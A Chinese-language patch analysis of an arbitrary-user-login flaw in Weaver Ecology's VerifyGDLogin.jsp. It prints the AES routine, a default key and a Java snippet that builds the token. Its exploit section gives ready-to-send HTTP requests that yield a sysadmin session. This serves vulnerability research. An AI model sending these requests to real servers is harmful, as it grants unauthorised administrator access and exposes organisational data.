0x01 前言

在跟踪泛微补丁包时发现Ecology_security_20230725_v9.0_v10.58.3的SecurityRuleGdLogin0317的补丁疑似修复了一个SQL注入，因此跟踪下看看

上图为补丁关键操作，看内容像是进行了SQL注入检测，后续分析发现是一处任意用户登录

0x02 分析

跟踪关键文件login/VerifyGDLogin.jsp

看源码为从URI中获取para、para1、para2后调用PoppupRemindInfoUtil.decrypt对para2做解密，然后通过weaver.login.VerifyGDLogin#getUserCheck方法进行登录校验

其中PoppupRemindInfoUtil.decrypt方法首先会校验WEB-INF/prop/AESpassword.properties中的pwd项是否为空，不为空则赋值给var1，为空则给var1赋值1

然后使用SM4IntegrationUtil.USE_SM4方法判断是否启用了国密SM4加密算法，如启用则使用SM4解密，否则调用AES.decrypt进行解密，默认为false

其中AES.decrypt方法如下

那么加密函数就为AES.encrypt，代码如下

public static String encryptAES_SunJCE(String var0, String var1) {
        byte[] var2 = null;
        try {
            KeyGenerator var3 = KeyGenerator.getInstance("AES");
            SecureRandom var4 = SecureRandom.getInstance("SHA1PRNG");
            var4.setSeed(var1.getBytes());
            var3.init(128, var4);
            SecretKey var5 = var3.generateKey();
            byte[] var6 = var5.getEncoded();
            SecretKeySpec var7 = new SecretKeySpec(var6, "AES");
            Cipher var8 = Cipher.getInstance("AES", "SunJCE");
            byte[] var9 = var0.getBytes();
            var8.init(1, var7);
            var2 = var8.doFinal(var9);
        } catch(NoSuchProviderException var10) {
            var10.printStackTrace();
        } catch(NoSuchAlgorithmException var11) {
            var11.printStackTrace();
        } catch(NoSuchPaddingException var12) {
            var12.printStackTrace();
        } catch(InvalidKeyException var13) {
            var13.printStackTrace();
        } catch(IllegalBlockSizeException var14) {
            var14.printStackTrace();
        } catch(BadPaddingException var15) {
            var15.printStackTrace();
        }
        return var2 == null ? "" : Tools.parseByte2HexStr(var2);
    }

生成加密数据的代码

package test;
import com.pluginweaver.utils.CryptTool;

public class testAesCrypt {
    public static void main(String[] args) {
        //4DUa6Wq9
        //1
        String cryptStr="1";
        String enStr=CryptTool.encryptAES_SunJCE( cryptStr,"4DUa6Wq9");
        System.out.println(enStr);
    }
}

0x03 Exploit

按照前文分析构造好数据包后发送

POST /login/VerifyGDLogin.jsp HTTP/1.1
Host: 192.168.232.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

para=ViewRequest.jsp&para1=123&para2=E4D160ED60A81E804F24EE2AE592D66F

复制返回的ecology_JSessionid访问需要鉴权的接口即可以sysadmin登录

GET /api/hrm/login/getAccountList?__random__=1700633695101 HTTP/1.1
Host: 192.168.232.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Referer: http://192.168.232.129/wui/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ecology_JSessionid=aaaOhmJeYzN2NbvHFv1Vy;
Connection: close